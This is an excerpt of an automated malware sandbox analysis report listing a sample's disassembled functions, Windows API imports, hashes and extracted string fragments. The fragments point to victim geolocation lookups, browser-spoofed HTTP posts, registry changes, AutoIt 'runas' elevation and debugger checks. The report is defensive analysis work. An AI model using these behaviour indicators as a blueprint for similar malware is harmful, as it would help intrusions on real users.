                    • Instruction ID: 53ccf60803aa8836d7366e45e4d019fb0888d0b7e4ffe46943b31cf4c1d238f5
                    • Opcode Fuzzy Hash: 8a3581b750d29c0f06103fe1997c215cccf07df72e665a86a296c08cae4d825b
                    • Instruction Fuzzy Hash: A6E0EC70500209BBEB009B64EE49D7B7BBCEB44345F404436AD51E2151D774D81C9A69
                    APIs
                    • lstrlenA.KERNEL32(00406495,?,00000000,00000000,?,00000000,00406495,00000000,[Rename]), ref: 00405874
                    • lstrcmpiA.KERNEL32(00000000,00406495), ref: 0040588C
                    • CharNextA.USER32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 0040589D
                    • lstrlenA.KERNEL32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 004058A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: cd19360c238f1349a786dd8267181da6a2629ba8d2dc02acca249f0761a9dd09
                    • Instruction ID: 678e37072a379e1faffe29b6aa71237c6b28e2b3d53614aa4618b887c013b5be
                    • Opcode Fuzzy Hash: cd19360c238f1349a786dd8267181da6a2629ba8d2dc02acca249f0761a9dd09
                    • Instruction Fuzzy Hash: 2CF0C236501448EFE701AFA5CD00C9F7BA8EF46350B2580BAEC40F7311D634DE019BA8

                    Execution Graph

                    Execution Coverage: 0.3%
                    Dynamic/Decrypted Code Coverage: 0%
                    Signature Coverage: 0%
                    Total number of Nodes: 392
                    Total number of Limit Nodes: 12
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Concurrency::cancel_current_task
                    • String ID: cou$)dat$)rb$-Goo$.php$/?fo$2nam$7IP:$=jso$?s=$Bcou$Cip$Code$Code$Content-Type: application/x-www-form-urlencoded$Fcom$Gip$HGoo$IPKc$LLC$Mdem$Morg$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0$POd~$Pdem$Rorg$Unam$X[M^$Ycou$\~ij$_cod$_cod$a$a$a$a$a$a$a$aIP:$aniz$aniz$atio$atio$bnam$caiP$ck`i$dfis$e$e$e$e2$gle $gle $h15$hdat$hip$home$https://ipgeolocation.io/$https://ipinfo.io/$idem$i~ib$jfl4lrk$jip$mo/$n$n$n$ntry$ntry$ntry$ntry$ntry$ntry$o$o$o$o$oInf$oInf$oInf$oInf$oiAM$p://$pany$pany$pany$pany$php$qhtt$rmat$scom$t/de$uia$uorg$ydat$zcou$|cou$|dat$~dem
                    • API String ID: 118556049-3855956954
                    • Opcode ID: c3ee10db6944ced87cf29388952067591f9c644204210f87eb60ce5982a5682d
                    • Instruction ID: 96d96266294ea79c59d1ab65d1af079708f2dad2fc00f9655fc89a6154d539f1
                    • Opcode Fuzzy Hash: c3ee10db6944ced87cf29388952067591f9c644204210f87eb60ce5982a5682d
                    • Instruction Fuzzy Hash: 67237B72A18BC096EB30DF24E4683DEB7A5F7E5754F405315DA9807BAAEB78C584CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Close$Open$CreateValue$Concurrency::cancel_current_task
                    • String ID: M$M$M$%Sle$'#$(win$.WIN$.dll$.dll$.dll$6.dl$@win$HTTP$atio$idA$inet$inet$ingS$jfl4lrk$l$laye$laye$meA$rBB$rBBU$uia
                    • API String ID: 3835448911-2765550813
                    • Opcode ID: 3e04320f6c1c5790a2cb7aa234d6550d79e61d62acd918811130c6d50eab86e1
                    • Instruction ID: f4e165cb7cbf9edca3d0896e876d475fd93a4d9522c6d7a17bb72d016c878a3c
                    • Opcode Fuzzy Hash: 3e04320f6c1c5790a2cb7aa234d6550d79e61d62acd918811130c6d50eab86e1
                    • Instruction Fuzzy Hash: 2AE2AB32B11640A9FB14DF75E4783EC23A1E7A8798F404626EE5E47B99EB78C1C6C350

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID: +Win$.dll$@Win$Http$Open$espo$http$ilab$nse$uts
                    • API String ID: 4139908857-425725236
                    • Opcode ID: a1d1ed7f936b3af39c98403c8cc03c629a006f6d09522c35867b88bc3d916740
                    • Instruction ID: 4acb9c44482f96738fc9c84eb9958bb9c7d6e537aaea0bc7e9be3b2b448ce44e
                    • Opcode Fuzzy Hash: a1d1ed7f936b3af39c98403c8cc03c629a006f6d09522c35867b88bc3d916740
                    • Instruction Fuzzy Hash: 82026B72B14B809AFB00DFB4D4693DD3772F765788F105205EE886BA59EB78C18AC784

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: HandleModule$lstrcatlstrcpy
                    • String ID: +Win$.dll$@Win$Http$Open$espo$http$ilab$nse$uts
                    • API String ID: 468718192-425725236
                    • Opcode ID: 9781dd0e1655e54f8228022fbb1c438dd310c16b75767e11c778bfa1b1ab73db
                    • Instruction ID: bf26097ba69b0e806be6d99fb736dd2a0c83ab08fa629e66281e614dc9660e31
                    • Opcode Fuzzy Hash: 9781dd0e1655e54f8228022fbb1c438dd310c16b75767e11c778bfa1b1ab73db
                    • Instruction Fuzzy Hash: F3D14876F04B81AAF700DFB4D4293DD3BB2F765788F105109DE486BA59EB78818AC784

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: AllocHeap
                    • String ID:
                    • API String ID: 4292702814-0
                    • Opcode ID: 6ede37f4c9a96b5ab927b0ed133db62c06f2130c7aea9d727cd70d3b60cba0cb
                    • Instruction ID: 5c73ac4d027f4adae03a7e7e1393ed23313e5682e914a27a0288d09a7f125356
                    • Opcode Fuzzy Hash: 6ede37f4c9a96b5ab927b0ed133db62c06f2130c7aea9d727cd70d3b60cba0cb
                    • Instruction Fuzzy Hash: A1F0B4F5342240A1FF55AB61983D3E642D8AB78BA2F2C58304D0A8B7D2EE3CC4C78210
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 3778422247-2988720461
                    • Opcode ID: 1994b040df7bcaa9eabea0218080e844f4ef20aa400ad816bcc9c45914f164a6
                    • Instruction ID: 2408ceecc96a7546e75061ca6fd3d5791ec19aae80602ad9e9a422b142a9eb64
                    • Opcode Fuzzy Hash: 1994b040df7bcaa9eabea0218080e844f4ef20aa400ad816bcc9c45914f164a6
                    • Instruction Fuzzy Hash: 4F415425F0969283F7149F25AC1C63A62D2BF88F86F908075C98ECB756DF7DAC098740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                    • String ID:
                    • API String ID: 3372153169-0
                    • Opcode ID: a52db60d96683ae5167440ae9686500b34fe88f611b94659a0c05ff1f19a1373
                    • Instruction ID: bbbc1c59e9a1a963611510c2464099eb386a83a0602689c6d648e5bb7a104c0f
                    • Opcode Fuzzy Hash: a52db60d96683ae5167440ae9686500b34fe88f611b94659a0c05ff1f19a1373
                    • Instruction Fuzzy Hash: 9D22BDA2A0AA9381EB609F25DC9427D2765FB54F96F544132CA9EC7792DF3CEC44C380
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: 22bf8f5eff2e45e1177610d568fa883e96c73c6f7677b33bea6826eb6c4db9aa
                    • Instruction ID: 4d4416a7b392269d55f78ab1527cbce24afd0d9e7bcea3ad34f9c311b8aea7ba
                    • Opcode Fuzzy Hash: 22bf8f5eff2e45e1177610d568fa883e96c73c6f7677b33bea6826eb6c4db9aa
                    • Instruction Fuzzy Hash: 64D18B76A057928AE754DF38DC947AD37A0FB84B99F000235DA8E87AA5DF3CE845C740
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: P
                    • API String ID: 0-3110715001
                    • Opcode ID: a1fc6bb4c017ecfb022866c81c1012e8c25de5f238352e173404b9bdaf33e861
                    • Instruction ID: 2fd37c73dca506508ef866ed32892a51d2bb785652dffbef61f686551ecac73d
                    • Opcode Fuzzy Hash: a1fc6bb4c017ecfb022866c81c1012e8c25de5f238352e173404b9bdaf33e861
                    • Instruction Fuzzy Hash: 7FA1CE72A09A9186E724DF25DC042B97B64FF85F86F408135EACE87A95CF7CE905CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                    • String ID: -$:$:$?
                    • API String ID: 3440502458-92861585
                    • Opcode ID: 92822d708f53ba3dc96aaad2734b3637ebae0f36d94d78d477610735c797914a
                    • Instruction ID: 7a1dcc37e9e73d5c16b72b1ad0a2ff007baacc84592fcfc82b04c6e9a460a827
                    • Opcode Fuzzy Hash: 92822d708f53ba3dc96aaad2734b3637ebae0f36d94d78d477610735c797914a
                    • Instruction Fuzzy Hash: 4AE1F572A196A285E724AF31DC405AA3759FB84F96F445135EACF83A96DF3CEC418700
                    APIs
                    • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C5873BA6
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C5873BBB
                    • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C5873C35
                      • Part of subcall function 00007FF6C5872BEC: GetFullPathNameW.KERNEL32(?,00007FF6C5873C67,?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C5872C4D
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C5873CCC
                    • MessageBoxA.USER32 ref: 00007FF6C58BAA96
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C58BAAE3
                    • GetForegroundWindow.USER32(?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C58BAB6A
                    • ShellExecuteW.SHELL32 ref: 00007FF6C58BAB91
                      • Part of subcall function 00007FF6C5873CEC: GetSysColorBrush.USER32 ref: 00007FF6C5873D06
                      • Part of subcall function 00007FF6C5873CEC: LoadCursorW.USER32 ref: 00007FF6C5873D16
                      • Part of subcall function 00007FF6C5873CEC: LoadIconW.USER32 ref: 00007FF6C5873D2B
                      • Part of subcall function 00007FF6C5873CEC: LoadIconW.USER32 ref: 00007FF6C5873D44
                      • Part of subcall function 00007FF6C5873CEC: LoadIconW.USER32 ref: 00007FF6C5873D5D
                      • Part of subcall function 00007FF6C5873CEC: LoadImageW.USER32 ref: 00007FF6C5873D89
                      • Part of subcall function 00007FF6C5873CEC: RegisterClassExW.USER32 ref: 00007FF6C5873DED
                      • Part of subcall function 00007FF6C5873E24: CreateWindowExW.USER32 ref: 00007FF6C5873E74
                      • Part of subcall function 00007FF6C5873E24: CreateWindowExW.USER32 ref: 00007FF6C5873EC7
                      • Part of subcall function 00007FF6C5873E24: ShowWindow.USER32 ref: 00007FF6C5873EDD
                      • Part of subcall function 00007FF6C587477C: Shell_NotifyIconW.SHELL32 ref: 00007FF6C5874874
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                    • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                    • API String ID: 1593035822-2030392706
                    • Opcode ID: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
                    • Instruction ID: 3b13ba3591f77bbc331bcf458127f4d2e6d6546a808cb76159ac1f5d0c33586c
                    • Opcode Fuzzy Hash: 1b2e34a7381e4e35feefe2342ee61d9da47ff135a521147e2ec28fd6c13dfd44
                    • Instruction Fuzzy Hash: 5E614C61A1E6D399EA60AF20EC801F92360BF90F96F801072E5CDC65A7DF6CED49C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ConditionInfoMaskVerifyVersion
                    • String ID: R2$ Vis$ XP$2008$^Win$dows$m:$ta
                    • API String ID: 3739615805-1714891448
                    • Opcode ID: 0fc8eafd479ed4f151cceea906d821aafa8c344c7d1bfa310519d605e54d6f45
                    • Instruction ID: 28dfe5d6ad9a2a608cf4a155d309fb4b866d60fbd839525a4abf24577b4c759e
                    • Opcode Fuzzy Hash: 0fc8eafd479ed4f151cceea906d821aafa8c344c7d1bfa310519d605e54d6f45
                    • Instruction Fuzzy Hash: 72225C32915BC099E770CF65E8643EA77A1F3E5768F104319EAA907B98EF78C690C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow
                    • String ID:
                    • API String ID: 312131281-0
                    • Opcode ID: 0640e42022e33a737d8eb2def458af6152ae9067368d775b9534069338d73c9b
                    • Instruction ID: e07b9eba19894e1cc80ce6cdcc2ace75777b551518acb264f5ed69d87462766a
                    • Opcode Fuzzy Hash: 0640e42022e33a737d8eb2def458af6152ae9067368d775b9534069338d73c9b
                    • Instruction Fuzzy Hash: 4A71B036608AD185E7208F65EC946EE3761FB89F95F400172DA9D87B66CF3CD986C700
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                    • String ID:
                    • API String ID: 1617910340-0
                    • Opcode ID: 315503640d0cebeabcd503def7dd823c6d783323a267f3e28206e8480c18e3c9
                    • Instruction ID: 976b79ba5b7d48e9356c4feb3556e3842cdc11cb0c4ff4be90aa95f12079d8dc
                    • Opcode Fuzzy Hash: 315503640d0cebeabcd503def7dd823c6d783323a267f3e28206e8480c18e3c9
                    • Instruction Fuzzy Hash: EAC1AD36720A4096FB10CFA9D4B86ED3771F369BA8F010215DE2A9B7D4DB34D89AC300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: $ $
                    • API String ID: 3215553584-3665324030
                    • Opcode ID: 134084e6dc032c73d0b45547bc5d58451d4eb7be48a728620d9d75ebaf16d494
                    • Instruction ID: db9bc670cd97e2fad3eb10bea37f3cf1afba76f65fc1167e3c852c9d9a050a0e
                    • Opcode Fuzzy Hash: 134084e6dc032c73d0b45547bc5d58451d4eb7be48a728620d9d75ebaf16d494
                    • Instruction Fuzzy Hash: CE12B172A05BC0A1FB65DB55E4783DAA3A5F7A5B80F409625EE8D53B99EF38C0D0C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID: +
                    • API String ID: 3744519093-2126386893
                    • Opcode ID: 3425f7cae65ff3b8154dcce6daa2999f053df4a4d3f6ea96a2573c11bc76522f
                    • Instruction ID: 370bbc93ebe22429614e6d70a1305c02720c5b66fc07e0aef8c667e3da320595
                    • Opcode Fuzzy Hash: 3425f7cae65ff3b8154dcce6daa2999f053df4a4d3f6ea96a2573c11bc76522f
                    • Instruction Fuzzy Hash: D3E1C261B0E2A682EA706E295D5817D6659FB49FC2F440236E9CEC7BD6CF3DED408700
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: 5#$l$uia
                    • API String ID: 0-1699049455
                    • Opcode ID: 725f9fc44d4f20c7688d1c050ec3a8172a0e34ba7edca7126311d9ef90c534aa
                    • Instruction ID: 0da73a4c0637be1bd7f4983c0dd52567bf2db7881d2025d8ba5e0fa702885615
                    • Opcode Fuzzy Hash: 725f9fc44d4f20c7688d1c050ec3a8172a0e34ba7edca7126311d9ef90c534aa
                    • Instruction Fuzzy Hash: 9F025F32614B8495EB20CF65E8783EA77A1F7A9788F004215EE8D4BB59EBBCD5C5C700
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: NULL Pointer assignment$Not an Object type
                    • API String ID: 0-572801152
                    • Opcode ID: 5c1a4e62a646acb0bd1b5f4cc6a62ef7cbaeb95efe67bf12c35b99f614103513
                    • Instruction ID: 9856fd7db8ef6e99b484fc7f3ca97a45420a04e3886476a6330ce0a7ae04114d
                    • Opcode Fuzzy Hash: 5c1a4e62a646acb0bd1b5f4cc6a62ef7cbaeb95efe67bf12c35b99f614103513
                    • Instruction Fuzzy Hash: BAE1B036B08BC286EB50CF25E8402AD77A0FB88B99F404636DA9D87B95DF3CD945C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                    • String ID: utf8
                    • API String ID: 3069159798-905460609
                    • Opcode ID: baf6e175754eebbbb3d4a4c8c78486df3b9de2ab08ece7b525ea66e24296a698
                    • Instruction ID: 002d55cd9889ce8ae82ed239d879bfcbf235e7a2e025da7f3e746a17c01ad52f
                    • Opcode Fuzzy Hash: baf6e175754eebbbb3d4a4c8c78486df3b9de2ab08ece7b525ea66e24296a698
                    • Instruction Fuzzy Hash: 0491BBB6300780A6FB24AF61D4793DA23E4F7A4B80F488125DE4947796EB78C6D3C761
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                    • String ID:
                    • API String ID: 2591520935-0
                    • Opcode ID: 46b67beaa7f79cf31c656f6efd9a45f3595a32c4283a6d05a191e21c9e949722
                    • Instruction ID: 073673a5e6e59336714f307bb9a7ea579f967f900ea4163ac0566e4ba3f345c9
                    • Opcode Fuzzy Hash: 46b67beaa7f79cf31c656f6efd9a45f3595a32c4283a6d05a191e21c9e949722
                    • Instruction Fuzzy Hash: F57148B2700610AAFB11AB74D8B87ED23F4F768B88F4444668E1957695EB38C4C7C350
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
